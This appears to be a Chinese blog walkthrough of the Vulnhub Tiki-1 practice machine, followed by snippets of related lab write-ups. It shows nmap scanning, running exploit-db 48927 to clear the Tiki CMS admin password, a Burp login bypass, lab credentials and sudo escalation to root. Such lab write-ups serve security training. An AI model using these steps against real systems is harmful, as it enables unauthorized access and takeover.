信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.133

从目标网站的robots.txt文件中，发现存在目录/tiki/

访问目录发现为tiki cms

该cms存在身份验证绕过

searchsploit tiki

漏洞利用

使用exp清空admin用户密码

searchsploit -p 48927
cp /usr/share/exploitdb/exploits/php/webapps/48927.py .
python3 48927.py 192.168.111.133

登录时使用burp抓包，清空pass参数的值之后发包，即可登录

在Wiki --> List Pages --> Credentials发现账号密码：silky | Agy8Y7SPJNXQzqA

提权

使用该账号密码登录目标ssh

ssh [email protected]

查看sudo权限

提升为root

sudo su

flag

标签：tiki,--,192.168,Tiki,Vulnhub,靶机,111.133,48927
From： https://www.cnblogs.com/ctostm/p/17410945.html

Vulnhub之election靶机详细测试过程
Election作者:jasonhuawen靶机信息名称:eLection:1URL:https://www.vulnhub.com/entry/election-1,503/识别IP地址─(kali㉿kali)-[~/Vulnhub/Election]└─$sudonetdiscover-ieth1-r192.168.56.0/24urrentlyscanning:192.168.56.0/24|ScreenView:U......
Vulnhub-Breach: 2.1
靶机地址：https://www.vulnhub.com/entry/breach-21,159/目标：Secondinamulti-partseries,Breach2.0isaboot2root/CTFchallengewhichattemptstoshowcaseareal-worldscenario,withplentyoftwistsandtrollsalongtheway.提示：Imaginethisasaproduction......
ICA：1~vulnhub
靶场环境：kali攻击机：10.21.29.198靶机：10.21.29.227信息收集首先进行端口扫描：发现22803306端口登录80端口发现是一登录页面首先可以看到CMS：qdPM9.2攻击过程kali进行漏洞库搜索：searchsploitqdPM9.2查看漏洞详情：```cat/usr/share/exploitdb/exploits/php/weba......
vulnhub --> Web Machine: (N7)
靶场下载地址WebMachine:(N7) <<点我开始打靶ip发现：nmap扫描网段发现靶机ip：192.168.56.101端口发现：对靶机进行常规端口扫描访问网站：目录扫描发现一个叫exploit.html的页面，访问页面发现是一个上传页面随便上传一个文件，点击提交查询，发现跳转到localhost域名CSRF......
Vulnhub-dpwwn01-WP
前言点击>>下载靶机靶机kalilinux：ip地址为192.168.20.200靶机探测使用nmap探测靶机nmap192.168.20.0/24靶机ip为192.168.20.131使用nmap进行详细扫描nmap-A-p-192.168.20.131点击查看扫描结果rootin/home/kalivia☕v17.0.6…➜nmap-A-p-192.168.2......
Vulnhub: InfoSec Prep:OSCP靶机
kali：192.168.111.111靶机：192.168.111.130信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.130访问80端口下的robots.txt文件，内容提示另一个文件/secret.txtsecret.txt文件内容为base64加密的字符串，解密后发现是ssh私钥echo'LS0tLS1CRUdJTiBPU......
Vulnhub之Funbox 4靶机详细测试过程（提权成功）
Funbox4靶机信息名称:Funbox:CTFURL:https://www.vulnhub.com/entry/funbox-ctf,546/识别靶机IP地址将靶机导入VirtualBox。配置其网卡为主机模式配置。启动KaliLinux和靶机。内置netdiscovery工具可以将靶机的IP地址识别为192.168.56.150。(kali㉿kali)-[~/D......
Vulnhub之Funbox Lunchbreaker靶机详细测试过程
FunboxLunchbreakAuthor:jasonhuawenVirtualMachineInformationName:Funbox:LunchbreakerURL:https://www.vulnhub.com/entry/funbox-lunchbreaker,700/IdentifyIPAddressofVirtualMachineImporttheVirtualMachineintotheVirtualBox.Configureits......
Vulnhub:Toppo 1靶机
kali：192.168.111.111靶机：192.168.111.130信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.130根据nmap的脚本http-enum收集到的信息，80端口的admin目录存放有notes.txt文件，根据文件内容得到密码：12345ted123使用cewl收集目标web信息cewlhttp://......
Vulnhub之Gain Power靶机详细测试过程
GainPower识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Gainpower]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts3CapturedARPRe......

Vulnhub: Tiki-1靶机

信息收集

漏洞利用

提权

相关文章

赞助商

阅读排行